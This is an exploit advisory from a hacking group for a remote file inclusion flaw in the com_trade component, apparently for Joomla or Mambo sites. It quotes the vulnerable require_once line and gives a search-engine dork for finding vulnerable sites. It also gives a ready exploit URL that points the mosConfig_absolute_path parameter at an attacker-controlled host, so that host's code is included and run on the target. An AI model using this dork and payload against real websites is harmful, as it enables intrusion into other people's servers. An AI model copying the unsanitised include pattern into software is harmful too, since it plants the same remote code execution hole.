|
#############################SolpotCrew Community################################ =0D
# =0D
# com_trade Remote File Inclusion (mosConfig_absolute_path) =0D
# =0D
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt=0D
# =0D
################################################################################# =0D
# =0D
# =0D
# Bug Found By :Blue|Spy =0D
# =0D
# contact: mail@sipplah.com =0D
# =0D
# Website : http://kunamgede.biz, http://blue-spy.com =0D
# =0D
################################################################################ =0D
# =0D
# =0D
# Greetz: h4ntu , Fungky, Solpot, Matdhule =0D
# and all crew #mardongan @ irc.dal.net =0D
# =0D
# =0D
############################################################################### =0D
code from tradetop.php =0D
=0D
require_once( $mosConfig_absolute_path."/components/com_trade/includes/trade/database.php" ); =0D
=0D
Dork: =0D
inurl:com_trade =0D
=0D
exploit: =0D
http://site.com/[path]//administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=[attacker] =0D
=0D
=0D
=0D
##############################MY LOVE JUST FOR U LIENA######################### =0D
########################################################################=0D